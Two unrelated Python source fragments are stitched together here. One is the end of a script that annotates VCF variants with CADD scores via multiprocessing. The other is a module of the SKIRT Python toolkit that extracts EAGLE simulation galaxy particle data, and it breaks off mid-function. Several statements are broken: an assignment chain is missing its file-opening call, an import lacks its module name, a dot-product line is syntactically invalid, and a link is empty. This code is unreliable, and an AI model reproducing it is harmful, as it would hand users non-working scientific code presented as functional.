options.cadd_indels or not os.path.exists(options.cadd_indels): print("Invalid CADD InDel file %s"%(options.cadd_indels)) return False if not os.path.exists(options.cadd_indels+".tbi"): print("No Index for CADD InDel file %s"%(options.cadd_indels+".tbi")) return False # ---- Other settings ---- try: int(options.nr_cpus) except Exception, e: print("Invalid nr of cpus defined %s"%(options.nr_cpus)) return False return True # CHECK arguments if not check_arguments(options): print("Error in provided arguments") exit(0) # CREATE globals VCF_READER = vcf.Reader(open(options.vcf_file, 'r')) VCF_WRITER = vcf.Writer(open(options.out_file, 'w'), VCF_READER) VCF_WRITER.close() VALID_CHROMOSOMES = {"1":True,"2":True,"3":True,"4":True,"5":True,"6":True,"7":True,"8":True,"9":True,"10":True,"11":True,"12":True,"13":True,"14":True,"15":True,"16":True,"17":True,"18":True,"19":True,"20":True,"21":True,"22":True,"X":True,"Y":True} # CADD extraction function def extract_CADD_score(arguments, q): vcf_record, caddfile = arguments tb = chromosome = (vcf_record.CHROM).replace("chr","") vcf_record.INFO["RAWCADD"] = 0 vcf_record.INFO["PHREDCADD"] = 0 # Specific for CADD files # FIXME: get info about chr or not from provided VCF file records = tb.query(chromosome, vcf_record.POS-1, vcf_record.POS) # Look for matching mutation # Works for SNVs, InDels optimisation is ongoing for rec in records: if rec[3] == vcf_record.ALT[0]: # FIXME: Make requested fields optional through arguments vcf_record.INFO["RAWCADD"] = rec[4] vcf_record.INFO["PHREDCADD"] = rec[5] break # workaround since multiprocess can't handle VCF record class objects # FIXME: use VCF class records rather than this ugly string annotated = VCF_WRITER._map(str, [vcf_record.CHROM, vcf_record.POS, vcf_record.ID, vcf_record.REF]) + [VCF_WRITER._format_alt(vcf_record.ALT), str(vcf_record.QUAL) or '.', VCF_WRITER._format_filter(vcf_record.FILTER), VCF_WRITER._format_info(vcf_record.INFO)] # Return results to Queue q.put(annotated) return(annotated) def listener(q): '''listens for messages on the q, writes to file. ''' #sys.stdout.write('Starting listener\n') f = open(options.out_file, 'wb') #FIXME: get the rest of the header f.write("##INFO=<ID=PHREDCADD,Number=1,Type=Float,Description=\"PHRED scaled CADD score\">") f.write("##INFO=<ID=RAWCADD,Number=1,Type=Float,Description=\"Raw CADD score\">") f.write('#' + '\t'.join(VCF_WRITER.template._column_headers + VCF_WRITER.template.samples) + '\n') f.flush() while 1: m = q.get() if m == 'kill': if not q.empty(): # received kill signal without finishing all the processes sys.stdout.write('ERROR\n') break # received kill signal, finished all the processes, done sys.stdout.write('DONE\n') break # A vcf record was found, write to file f.write('\t'.join(m)+'\n') f.flush() f.close() def main(): currtime = time() #Init Manager queue manager = mp.Manager() q = manager.Queue() # Init worker pool pool = mp.Pool(int(options.nr_cpus)) #Init Listener watcher = pool.apply_async(listener, (q,)) #print("Filling Queue") #fire off workers jobs = [] for vcf_record in VCF_READER: chromosome = (vcf_record.CHROM).replace("chr","") if chromosome not in VALID_CHROMOSOMES: continue arguments = [] if vcf_record.is_indel: arguments = [vcf_record, options.cadd_indels] else: arguments = [vcf_record, options.cadd_snvs] job = pool.apply_async(extract_CADD_score, (arguments, q)) jobs.append(job) #print("Collecting results") # collect results from the workers through the pool result queue for job in jobs: job.get() # now we are done, kill the listener q.put('kill') pool.close() pool.join() print 'time elapsed:', time() - currtime if __name__ == "__main__": main()
#!/usr/bin/env python # -*- coding: utf8 -*- # ***************************************************************** # ** PTS -- Python Toolkit for working with SKIRT ** # ** © Astronomical Observatory, Ghent University ** # ***************************************************************** ## \package pts.eagle.extractor Extracting data for a given EAGLE galaxy from the simulation snapshot. # # The EAGLE simulation output is stored in a (large) set of data files in the HDF5 format, documented at the # <a href="">HFD5 home page</a>. The output is organized in \em snapshots, where # each snapshot represents the state of the universe at a particular time (or equivalently, redshift). # # The function in this module allows extracting information relevant for SKIRT from the EAGLE output. # The function converts physical quantities from EAGLE snapshot units (documented through hdf5 attributes # in the snapshot files) to SKIRT import units (documented in the SKIRT SPH classes). # The following table lists some of the units in each system. # #<TABLE> #<TR><TD><B>Physical Quantity</B></TD> <TD><B>EAGLE snapshot</B></TD> # <TD><B>SKIRT import</B></TD></TR> #<TR><TD>position, size</TD> <TD>\f$\textrm{Mpc}\,a\,h^{-1}\f$</TD> # <TD>\f$\textrm{pc}\f$</TD></TR> #<TR><TD>mass</TD> <TD>\f$10^{10}\,\textrm{M}_\odot\,h^{-1}\f$</TD> # <TD>\f$\textrm{M}_\odot\f$</TD></TR> #<TR><TD>velocity</TD> <TD>\f$\textrm{km/s}\,a^{1/2}\f$</TD> # <TD>--</TD></TR> #<TR><TD>time, age</TD> <TD>--</TD> # <TD>year</TD></TR> #<TR><TD>temperature</TD> <TD>K</TD> # <TD>--</TD></TR> #</TABLE> # # Note the corrections for cosmological scale factor \f$a\f$ and hubble parameter \f$h\f$ in the EAGLE snapshot units. # ----------------------------------------------------------------- import os.path import numpy as np import h5py import read_eagle # EAGLE-specific package by must be seperately installed from import Transform from . import config as config from .skirtrun import SkirtRun # ----------------------------------------------------------------- ## This function extracts information relevant for SKIRT from the EAGLE output for the galaxy described # by the specified SKIRT-runs database record. It places the resulting files in the "in" folder of the # appropriate SkirtRun data structure. The function uses the following fields in the specified record: # runid, eaglesim, snaptag, galaxyid, groupnr, subgroupnr, copx, copy, copz. # # The exported files are named "SIM_GID_stars.dat", "SIM_GID_hii.dat", and "SIM_GID_gas.dat", where # SIM and GID are replaced respectively by the name of the simulation in which the galaxy resides and by the # identifier of the galaxy in the public EAGLE database. The file format is as described for SKIRT SPH import. # In addition, the function creates a text file named "SIM_GID_info.txt", which contains relevant statistics # including particle numbers and various total masses. The contents is documented in the file. def extract(record): # ---- get the particle data # initialise star and gas dictionaries sdat = {} gdat = {} yngstars = {} hiiregions = {} # open snapshot and read relevant field attributes sfn = snapfilename(record["eaglesim"], record["snaptag"]) snapshot = read_eagle.EagleSnapshot(sfn) params = fieldAttrs(sfn, "Header") params.update(fieldAttrs(sfn, "Constants")) params.update(fieldAttrs(sfn, "RuntimePars")) hubbleparam = params["HubbleParam"] expansionfactor = params["ExpansionFactor"] schmidtparams = schmidtParameters(params) # convert center of potential to snapshot units copx = record["copx"] * hubbleparam copy = record["copy"] * hubbleparam copz = record["copz"] * hubbleparam # specify (2*250kpc)^3 physical volume about galaxy centre delta = 0.25 * hubbleparam / expansionfactor snapshot.select_region(copx-delta, copx+delta, copy-delta, copy+delta, copz-delta, copz+delta) # read star particle informaton insubhalo = (snapshot.read_dataset(4, "GroupNumber") == record["groupnr"]) & \ (snapshot.read_dataset(4, "SubGroupNumber") == record["subgroupnr"]) sdat['r'] = snapshot.read_dataset(4, "Coordinates") [insubhalo] sdat['h'] = snapshot.read_dataset(4, "SmoothingLength") [insubhalo] sdat['im'] = snapshot.read_dataset(4, "InitialMass") [insubhalo] sdat['m'] = snapshot.read_dataset(4, "Mass") [insubhalo] sdat['v'] = snapshot.read_dataset(4, "Velocity") [insubhalo] sdat['Z'] = snapshot.read_dataset(4, "SmoothedMetallicity") [insubhalo] sdat['born'] = snapshot.read_dataset(4, "StellarFormationTime") [insubhalo] sdat['rho_born'] = snapshot.read_dataset(4, "BirthDensity") [insubhalo] # read gas particle informaton insubhalo = (snapshot.read_dataset(0, "GroupNumber") == record["groupnr"]) & \ (snapshot.read_dataset(0, "SubGroupNumber") == record["subgroupnr"]) gdat['r'] = snapshot.read_dataset(0, "Coordinates") [insubhalo] gdat['h'] = snapshot.read_dataset(0, "SmoothingLength") [insubhalo] gdat['m'] = snapshot.read_dataset(0, "Mass") [insubhalo] gdat['v'] = snapshot.read_dataset(0, "Velocity") [insubhalo] gdat['Z'] = snapshot.read_dataset(0, "SmoothedMetallicity") [insubhalo] gdat['T'] = snapshot.read_dataset(0, "Temperature") [insubhalo] gdat['rho'] = snapshot.read_dataset(0, "Density") [insubhalo] gdat['sfr'] = snapshot.read_dataset(0, "StarFormationRate") [insubhalo] # convert units sdat['r'] = periodicCorrec(sdat['r'], params["BoxSize"]) sdat['r'] = toparsec(sdat['r'], hubbleparam, expansionfactor) sdat['h'] = toparsec(sdat['h'], hubbleparam, expansionfactor) sdat['im'] = tosolar(sdat['im'], hubbleparam) sdat['m'] = tosolar(sdat['m'], hubbleparam) sdat['t'] = age(sdat['born']) - age(expansionfactor) sdat['rho_born'] *= 6.7699e-31 gdat['r'] = periodicCorrec(gdat['r'], params["BoxSize"]) gdat['r'] = toparsec(gdat['r'], hubbleparam, expansionfactor) gdat['h'] = toparsec(gdat['h'], hubbleparam, expansionfactor) gdat['m'] = tosolar(gdat['m'], hubbleparam) gdat['rho'] = togcm3(gdat['rho'], hubbleparam, expansionfactor) # remember density conversion from g cm^-3 to M_sun Mpc^-3 densconv = ((params['CM_PER_MPC']/1.e6)**3) / params['SOLAR_MASS'] # calculate the ISM pressure sdat['P'] = getPtot(sdat['rho_born'], schmidtparams) gdat['P'] = getPtot(gdat['rho'], schmidtparams) # calculate stellar center of mass and translational velocity using shrinking aperture technique com, v_bar = shrinkingCentroid(sdat['r'], sdat['m'], sdat['v']) # find unit rotation axis vector, using only stellar information and an aperture of 30 kpc n_rot = rotAxis(sdat['r'], sdat['v'], sdat['m'], com, v_bar, apt=30e3, aptfrac=0.08) # translate to center of mass and line up with angular momentum vector transf = Transform() transf.translate(-com[0], -com[1], -com[2]) a, b, c = n_rot v = np.sqrt(b*b+c*c) if v > 0.3: transf.rotateX(c/v, -b/v) transf.rotateY(v, -a) else: v = np.sqrt(a*a+c*c) transf.rotateY(c/v, -a/v) transf.rotateX(v, -b) sdat['r'],w = transf.transform_vec(sdat['r'][:,0],sdat['r'][:,1],sdat['r'][:,2], np.ones(sdat['r'].shape[0])) gdat['r'],w = transf.transform_vec(gdat['r'][:,0],gdat['r'][:,1],gdat['r'][:,2], np.ones(gdat['r'].shape[0])) # apply 30kpc aperture (i.e. remove all particles outside the aperture) applyAperture(sdat, 30e3) applyAperture(gdat, 30e3) # ---- gather statistics about the data as read from the snapshot # information identifying the SKIRT-run record and the galaxy info = { } info["skirt_run_id"] = record["runid"] info["galaxy_id"] = record["galaxyid"] # information about the particles info["original_particles_stars"] = len(sdat['m']) info["original_initial_mass_stars"] = sdat['im'].sum() info["original_mass_stars"] = sdat['m'].sum() info["original_particles_gas"] = len(gdat['m']) info["original_mass_gas"] = gdat['m'].sum() info["original_mass_baryons"] = info["original_mass_stars"] + info["original_mass_gas"] # information about the direction of the stellar angular momentum axis info["original_rotation_axis_x"] = n_rot[0] info["original_rotation_axis_y"] = n_rot[1] info["original_rotation_axis_z"] = n_rot[2] # ---- initialize statistics about the exported data info["exported_particles_old_stars"] = 0 info["exported_initial_mass_old_stars"] = 0 info["exported_mass_old_stars"] = 0 info["exported_particles_non_star_forming_gas"] = 0 info["exported_mass_non_star_forming_gas"] = 0 info["exported_particles_young_stars_from_stars"] = 0 info["exported_initial_mass_young_stars_from_stars"] = 0 info["exported_mass_young_stars_from_stars"] = 0 info["exported_particles_hii_regions_from_stars"] = 0 info["exported_initial_mass_hii_regions_from_stars"] = 0 info["exported_mass_hii_regions_from_stars"] = 0 info["exported_particles_unspent_gas_from_stars"] = 0 info["exported_mass_unspent_gas_from_stars"] = 0 info["exported_particles_young_stars_from_gas"] = 0 info["exported_initial_mass_young_stars_from_gas"] = 0 info["exported_mass_young_stars_from_gas"] = 0 info["exported_particles_hii_regions_from_gas"] = 0 info["exported_initial_mass_hii_regions_from_gas"] = 0 info["exported_mass_hii_regions_from_gas"] = 0 info["exported_particles_negative_gas_from_stars"] = 0 info["exported_particles_negative_gas_from_gas"] = 0 info["exported_mass_negative_gas_from_stars"] = 0 info["exported_mass_negative_gas_from_gas"] = 0 info["exported_particles_unspent_gas_from_gas"] = 0 info["exported_mass_unspent_gas_from_gas"] = 0 # ---- resample star forming regions # set the "standard" constant covering fraction (see Camps+ 2016) f_PDR = 0.1 # seed the random generator so that a consistent pseudo-random sequence is used for each particular galaxy np.random.seed(int(record["galaxyid"])) # define HII region age constants (in years) young_age = 1e8 # 100 Myr --> particles below this age are resampled infant_age = 1e7 # 10 Myr --> resampled particles below this age are converted to HII regions # resampled particles above this age are converted young stars # <==> lifetime of an HII region # set up GALAXEV array bcstars = np.column_stack([[],[],[],[],[],[],[]]) # set up MAPPINGS-III array mapstars = np.column_stack([[],[],[],[],[],[],[],[],[]]) # set up dust array dust = np.column_stack([[],[],[],[],[],[],[]]) # index for particles to resample issf = gdat['sfr'] > 0. isyoung = sdat['t'] < young_age # append older stars to GALAXEV array if (~isyoung).any(): bcstars = np.concatenate((bcstars, np.column_stack([sdat['r'], sdat['h'], sdat['im'], sdat['Z'], sdat['t']])[~isyoung]), axis=0) info["exported_particles_old_stars"] = np.count_nonzero(~isyoung) info["exported_initial_mass_old_stars"] = sdat['im'][~isyoung].sum() info["exported_mass_old_stars"] = sdat['m'][~isyoung].sum() # append non-SF gas data to dust array if (~issf).any(): dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], gdat['m'], gdat['Z'], gdat['T']])[~issf].copy()), axis=0) info["exported_particles_non_star_forming_gas"] = np.count_nonzero(~issf) info["exported_mass_non_star_forming_gas"] = gdat['m'][~issf].sum() # resample stars if isyoung.any(): for k in sdat.keys(): sdat[k] = sdat[k][isyoung].copy() # calculate SFR at birth of young star particles in M_sun / yr sdat['sfr'] = getSFR(sdat['rho_born'], sdat['im'], schmidtparams) ms, ts, idxs, mdiffs = stochResamp(sdat['sfr'], sdat['im']) isinfant = ts < infant_age if (~isinfant).any(): yngstars['r'] = sdat['r'][idxs][~isinfant] yngstars['h'] = sdat['h'][idxs][~isinfant] yngstars['im'] = ms[~isinfant] yngstars['Z'] = sdat['Z'][idxs][~isinfant] yngstars['t'] = ts[~isinfant] bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0) info["exported_particles_young_stars_from_stars"] = np.count_nonzero(~isinfant) info["exported_initial_mass_young_stars_from_stars"] = ms[~isinfant].sum() info["exported_mass_young_stars_from_stars"] = info["exported_initial_mass_young_stars_from_stars"] if (isinfant).any(): hiiregions['r'] = sdat['r'][idxs][isinfant] hiiregions['h'] = sdat['h'][idxs][isinfant] hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime hiiregions['Z'] = sdat['Z'][idxs][isinfant] hiiregions['P'] = sdat['P'][idxs][isinfant] * 0.1 # Convert to Pa for output hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4 hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value # calculate the HII region smoothing length from the mass of the surrounding PDR region, # estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44), # using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3; # and randomly shift the positions of the HII regions within a similarly enlarged range hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * sdat['rho_born'][idxs][isinfant] * densconv))**(1/3.) stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp']) # append to MAPPINGSIII array mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'], hiiregions['Z'], hiiregions['logC'], hiiregions['P'], hiiregions['fPDR']])), axis=0) info["exported_particles_hii_regions_from_stars"] = np.count_nonzero(isinfant) info["exported_initial_mass_hii_regions_from_stars"] = ms[isinfant].sum() info["exported_mass_hii_regions_from_stars"] = info["exported_initial_mass_hii_regions_from_stars"] # append to dust array with negative mass to compensate for the mass of the surrounding PDR region, # considered to be 10 times as massive; use zero temperature as T is unavailable for resampled star particles dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3., -10*ms[isinfant], hiiregions['Z'], np.zeros(hiiregions['Z'].shape[0])]).copy()), axis=0) info["exported_particles_negative_gas_from_stars"] = np.count_nonzero(isinfant) info["exported_mass_negative_gas_from_stars"] = 10*ms[isinfant].sum() # add unspent young star particle material to dust array # use zero temperature as T is unavailable for resampled star particles mass = sdat['im'] - mdiffs dust = np.concatenate((dust, np.column_stack([sdat['r'], sdat['h'], mass, sdat['Z'], np.zeros(sdat['Z'].shape[0])]).copy()), axis=0) info["exported_particles_unspent_gas_from_stars"] = len(mass) info["exported_mass_unspent_gas_from_stars"] = mass.sum() # resample gas if issf.any(): for k in gdat.keys(): gdat[k] = gdat[k][issf].copy() ms, ts, idxs, mdiffs = stochResamp(gdat['sfr'], gdat['m']) isinfant = ts < infant_age if (~isinfant).any(): yngstars['r'] = gdat['r'][idxs][~isinfant] yngstars['h'] = gdat['h'][idxs][~isinfant] yngstars['im'] = ms[~isinfant] yngstars['Z'] = gdat['Z'][idxs][~isinfant] yngstars['t'] = ts[~isinfant] bcstars = np.concatenate((bcstars, np.column_stack([yngstars['r'], yngstars['h'], yngstars['im'], yngstars['Z'], yngstars['t']])), axis=0) info["exported_particles_young_stars_from_gas"] = np.count_nonzero(~isinfant) info["exported_initial_mass_young_stars_from_gas"] = ms[~isinfant].sum() info["exported_mass_young_stars_from_gas"] = info["exported_initial_mass_young_stars_from_gas"] if (isinfant).any(): hiiregions['r'] = gdat['r'][idxs][isinfant] hiiregions['h'] = gdat['h'][idxs][isinfant] hiiregions['SFR'] = ms[isinfant] / infant_age # Assume constant SFR over HII region lifetime hiiregions['Z'] = gdat['Z'][idxs][isinfant] hiiregions['P'] = gdat['P'][idxs][isinfant] * 0.1 # convert to Pa hiiregions['logC'] = 0.6*np.log10(ms[isinfant]) + 0.4*np.log10(hiiregions['P']) - 0.4*np.log10(params['BOLTZMANN']) + 0.4 hiiregions['fPDR'] = np.zeros_like(ts[isinfant]) + f_PDR # Covering fraction is set to constant value # calculate the HII region smoothing length from the mass of the surrounding PDR region, # estimated to be 10 times as massive (see Jonsson et al. 2010, MNRAS 403, 17-44), # using SKIRT's standard smoothing kernel mass/size normalization: rho = 8/pi * M/h^3; # and randomly shift the positions of the HII regions within a similarly enlarged range hiiregions['h_mapp'] = (10*ms[isinfant] / (np.pi/8 * gdat['rho'][idxs][isinfant] * densconv))**(1/3.) stochShiftPos(hiiregions['r'], hiiregions['h'], hiiregions['h_mapp']) # append to MAPPINGSIII array mapstars = np.concatenate((mapstars, np.column_stack([hiiregions['r'], hiiregions['h_mapp'], hiiregions['SFR'], hiiregions['Z'], hiiregions['logC'], hiiregions['P'], hiiregions['fPDR']])), axis=0) info["exported_particles_hii_regions_from_gas"] = np.count_nonzero(isinfant) info["exported_initial_mass_hii_regions_from_gas"] = ms[isinfant].sum() info["exported_mass_hii_regions_from_gas"] = info["exported_initial_mass_hii_regions_from_gas"] # append to dust array with negative mass to compensate for the mass of the surrounding PDR region, # considered to be 10 times as massive; use negative temperature to indicate that it is not a physical value dust = np.concatenate((dust, np.column_stack([hiiregions['r'], hiiregions['h_mapp']*3, -10*ms[isinfant], hiiregions['Z'], -gdat['T'][idxs][isinfant]]).copy()), axis=0) info["exported_particles_negative_gas_from_gas"] = np.count_nonzero(isinfant) info["exported_mass_negative_gas_from_gas"] = 10*ms[isinfant].sum() # add unspent SF gas material to dust array; use negative temperature to indicate that it is not a physical value mass = gdat['m'] - mdiffs dust = np.concatenate((dust, np.column_stack([gdat['r'], gdat['h'], mass, gdat['Z'], -gdat['T']]).copy()), axis=0) info["exported_particles_unspent_gas_from_gas"] = len(mass) info["exported_mass_unspent_gas_from_gas"] = mass.sum() # ---- make some sums and write the statistics and output files info["exported_particles_young_stars"] = info["exported_particles_young_stars_from_stars"] + info["exported_particles_young_stars_from_gas"] info["exported_initial_mass_young_stars"] = info["exported_initial_mass_young_stars_from_stars"] + info["exported_initial_mass_young_stars_from_gas"] info["exported_mass_young_stars"] = info["exported_mass_young_stars_from_stars"] + info["exported_mass_young_stars_from_gas"] info["exported_particles_stars"] = info["exported_particles_old_stars"] + info["exported_particles_young_stars"] info["exported_initial_mass_stars"] = info["exported_initial_mass_old_stars"] + info["exported_initial_mass_young_stars"] info["exported_mass_stars"] = info["exported_mass_old_stars"] + info["exported_mass_young_stars"] info["exported_particles_hii_regions"] = info["exported_particles_hii_regions_from_stars"] + info["exported_particles_hii_regions_from_gas"] info["exported_initial_mass_hii_regions"] = info["exported_initial_mass_hii_regions_from_stars"] + info["exported_initial_mass_hii_regions_from_gas"] info["exported_mass_hii_regions"] = info["exported_mass_hii_regions_from_stars"] + info["exported_mass_hii_regions_from_gas"] info["exported_particles_unspent_gas"] = info["exported_particles_unspent_gas_from_stars"] + info["exported_particles_unspent_gas_from_gas"] info["exported_mass_unspent_gas"] = info["exported_mass_unspent_gas_from_stars"] + info["exported_mass_unspent_gas_from_gas"] info["exported_particles_negative_gas"] = info["exported_particles_negative_gas_from_stars"] + info["exported_particles_negative_gas_from_gas"] info["exported_mass_negative_gas"] = info["exported_mass_negative_gas_from_stars"] + info["exported_mass_negative_gas_from_gas"] info["exported_particles_gas"] = info["exported_particles_non_star_forming_gas"] + info["exported_particles_unspent_gas"] + info["exported_particles_negative_gas"] info["exported_mass_gas"] = info["exported_mass_non_star_forming_gas"] + info["exported_mass_unspent_gas"] # - info["exported_mass_negative_gas"] info["exported_mass_baryons"] = info["exported_mass_stars"] + info["exported_mass_hii_regions"] + info["exported_mass_gas"] # create the appropriate SKIRT-run directories skirtrun = SkirtRun(record["runid"], create=True) filepathprefix = os.path.join(skirtrun.inpath(), "{}_{}_".format(record["eaglesim"], record["galaxyid"])) # write the statistics file infofile = open(filepathprefix + "info.txt", 'w') infofile.write('# Statistics for SPH particles extracted from EAGLE HDF5 snapshot to SKIRT6 format\n') infofile.write('# Masses are expressed in solar mass units\n') maxkeylen = max(map(len,info.keys())) for key in sorted(info.keys()): valueformat = "d" if "_particles_" in key or "_id" in key else ".9e" infofile.write( ("{0:"+str(maxkeylen)+"} = {1:15"+valueformat+"}\n").format(key, info[key]) ) infofile.close() # ---- write output files # open output files starsfile = open(filepathprefix + "stars.dat", 'w') starsfile.write('# SPH Star Particles\n') starsfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n') starsfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) t(yr)\n') gasfile = open(filepathprefix + "gas.dat", 'w') gasfile.write('# SPH Gas Particles\n') gasfile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n') gasfile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) M(Msun) Z(0-1) T(K)\n') hiifile = open(filepathprefix + "hii.dat", 'w') hiifile.write('# SPH Hii Particles\n') hiifile.write('# Extracted from EAGLE HDF5 snapshot to SKIRT6 format\n') hiifile.write('# Columns contain: x(pc) y(pc) z(pc) h(pc) SFR(Msun/yr) Z(0-1) logC P(Pa) f_PDR\n') # save particle data np.savetxt(starsfile, bcstars, fmt=['%f']*7) np.savetxt(gasfile, dust, fmt=['%f']*7) np.savetxt(hiifile, mapstars, fmt=['%f']*7+['%e','%f']) # close output files starsfile.close() gasfile.close() hiifile.close() # ----------------------------------------------------------------- ## This private helper function returns the absolute path to the first EAGLE snapshot file # corresponding to the given EAGLE simulation name and snapshot tag def snapfilename(eaglesim, snaptag): # snapshot filename segment corresponding to the snapshot tag snapname = { 0 : "000_z020p000", 1 : "001_z015p132", 2 : "002_z009p993", 3 : "003_z008p988", 4 : "004_z008p075", 5 : "005_z007p050", 6 : "006_z005p971", 7 : "007_z005p487", 8 : "008_z005p037", 9 : "009_z004p485", 10 : "010_z003p984", 11 : "011_z003p528", 12 : "012_z003p017", 13 : "013_z002p478", 14 : "014_z002p237", 15 : "015_z002p012", 16 : "016_z001p737", 17 : "017_z001p487", 18 : "018_z001p259", 19 : "019_z001p004", 20 : "020_z000p865", 21 : "021_z000p736", 22 : "022_z000p615", 23 : "023_z000p503", 24 : "024_z000p366", 25 : "025_z000p271", 26 : "026_z000p183", 27 : "027_z000p101", 28 : "028_z000p000" } [snaptag] return os.path.join(config.eagledata_path[eaglesim], "particledata_{0}/eagle_subfind_particles_{0}.0.hdf5".format(snapname)) # ----------------------------------------------------------------- ## This private helper function reads a hdf5 file field's attributes into a python dictionary. def fieldAttrs(filename, fieldname): fileobj = h5py.File(filename, 'r') fieldobj = fileobj[fieldname] fieldkeys = list(fieldobj.attrs) result = { } for key in fieldkeys: result[key] = fieldobj.attrs[str(key)] return result # ----------------------------------------------------------------- ## This private helper function converts a length/distance/size value from EAGLE snapshot units to parsec def toparsec(eaglevalue, hubbleparam, expansionfactor): return eaglevalue * (1e6 * expansionfactor / hubbleparam) ## This private helper function converts a mass value from EAGLE snapshot units to solar masses def tosolar(eaglevalue, hubbleparam): return eaglevalue * (1e10 / hubbleparam) ## This private helper function converts a velocity value from EAGLE snapshot units to km/s def tokms(eaglevalue, expansionfactor): return eaglevalue * np.sqrt(expansionfactor) ## This private helper function converts a current density value from EAGLE snapshot units to g m^-3 def togcm3(eaglevalue, hubbleparam, expansionfactor): return eaglevalue * (6.7699e-31 * (expansionfactor**-3) * (hubbleparam**2)) ## This private helper function returns the age of a star (in yr) given the universe expansion factor # when the star was born (in range 0-1) def age(R): H0 = 2.3e-18 OmegaM0 = 0.27 yr = 365.25 * 24 * 3600 T0 = 13.7e9 return T0 - (2./3./H0/np.sqrt(1-OmegaM0)) * np.arcsinh(np.sqrt( (1/OmegaM0-1)*R**3 )) / yr # ----------------------------------------------------------------- ## This private helper function returns the periodicity corrected coordinates input as a (N,3) # numpy array, and takes the box size (in units of crds) and a test length in units of box size def periodicCorrec(crds, boxsize, testfact = 0.5): if len(crds)>0: for i in range(3): crd = crds[:,i] booldx = np.abs(crd - crd.min()) > boxsize * testfact if booldx.any(): crd[booldx] = crd[booldx] - boxsize return crds # ----------------------------------------------------------------- ## This private helper function returns the centre of mass or the centre of mass and mean velocity # from input particle data, in the units of crds and vels respectively def centroid(crds, masses, vels): moments = (crds * np.column_stack([masses]*3)).sum(axis = 0) M = masses.sum() if vels.any(): momenta = (vels * np.column_stack([masses]*3)).sum(axis = 0) return moments/M, momenta/M else: return moments/M # ----------------------------------------------------------------- ## This private helper function returns the periodicity corrected coordinates input as a (N,3) # numpy array, and takes the box size (in units of crds) and a test length in units of box size. # Finds the centroid of a given set of particles, each time reducing the # maximum distance between the previously found centroid to particles used # to calculate the next centroid. def shrinkingCentroid(crds, masses, vels, thresh=200, shrinkfactor=1.2): N = np.inf # N set high initially to consider all particles while N >= thresh: C, C_vel = centroid(crds, masses, vels) # define new aperture size as eps eps = ((((crds-C)**2).sum(axis = -1))**0.5).max()/float(shrinkfactor) # index for particles within new aperture size shiftcrds = crds - C boolidx = ((shiftcrds**2).sum(axis = -1))**0.5 < eps N = boolidx.sum() crds = crds[boolidx].copy() masses = masses[boolidx].copy() vels = vels[boolidx].copy() return C, C_vel # ----------------------------------------------------------------- ## This private helper function returns the unit vector pointing in the direction of the rotation # axis for input particle data, input CoM and input mean velocity. apt specifies an aperture to # consider particles within in the units of pos, and aptfrac defines and inner radius within which to # exclude particles in units of apt. def rotAxis(crds, vels, mass, com, v_bar, apt = 3e4, aptfrac = 0.08): # put in centre of mass and rest frame pos = crds - com v_rel = vels - v_bar # calculate apertures disp = (pos**2).sum(axis=-1) outapt = disp < apt ** 2 inapt = disp > (aptfrac * apt) ** 2 totapt = inapt * outapt # calculate J vectors in arbitrary units Js = np.cross(pos[totapt], v_rel[totapt]) * np.column_stack([mass[totapt]]*3) # calculate net J vector and normalise to unit vector J = Js.sum(axis = 0) norm2 =, J).sum() if norm2 > 0: return J * norm2 ** -0.5 else: return np.array((0,0,1)) # ----------------------------------------------------------------- ## This private helper function applies a spherical aperture to a dictionary of particle data, i.e. it # adjusts the dictionary so that the particles outside the aperture are removed from each array. def applyAperture(data, radius): x,y,z = data['r'].T inside = (x*x+y*y+z*z) <= (radius*radius) if inside.any(): for key in data: data[key] = data[key][inside] else: for key in data: shape = list(data[key].shape) shape[0] = 0 data[key] = np.zeros(shape) # ----------------------------------------------------------------- ## This private helper function reads the Schmidt parameters into a python structure. def schmidtParameters(params): # extract relevent unit conversions CM_PER_MPC = params['CM_PER_MPC'] GAMMA = params['GAMMA'] GRAV = params['GRAVITY'] K_B = params['BOLTZMANN'] M_PROTON = params['PROTONMASS'] M_SUN = params['SOLAR_MASS'] SEC_PER_YEAR = params['SEC_PER_YEAR'] # extract relevent runtime parameters used to create EAGLE snapshot GammaEff = params['EOS_Jeans_GammaEffective'] InitH = params['InitAbundance_Hydrogen'] RhoHi = params['SF_SchmidtLawHighDensThresh_HpCM3'] RhoNorm = params['EOS_NormPhysDens_HpCM3'] SchmidtCoeff = params['SF_SchmidtLawCoeff_MSUNpYRpKPC2'] SchmidtExp = params['SF_SchmidtLawExponent'] SchmidtExpHi = params['SF_SchmidtLawHighDensExponent'] T_JeansNorm = params['EOS_Jeans_TempNorm_K'] # Normalisation in cgs units Norm_cgs = SchmidtCoeff * pow(pow(CM_PER_MPC / 1.e6, 2) / M_SUN , SchmidtExp - 1) / (1.e6 * SEC_PER_YEAR) # High density Threshold RhoHi_cgs = RhoHi * M_PROTON / InitH # Density normalisation in cgs RhoNorm_cgs = RhoNorm * M_PROTON / InitH # Min total Pressure P_totc = RhoNorm * T_JeansNorm * K_B / (InitH * 1.22) # Pressure at high density Schmidt law break PBreak_cgs = P_totc * (RhoHi/RhoNorm) ** GammaEff # Assume f_g = 1 NormHi_cgs = Norm_cgs * (GAMMA * PBreak_cgs / GRAV) ** ((SchmidtExp - SchmidtExpHi) * 0.5) # tuple of universal SF parameters sfparams = RhoNorm_cgs, RhoHi_cgs, P_totc, PBreak_cgs, GammaEff # tuples of high and low pressure SF parameters sf_lo = Norm_cgs, GAMMA/GRAV, 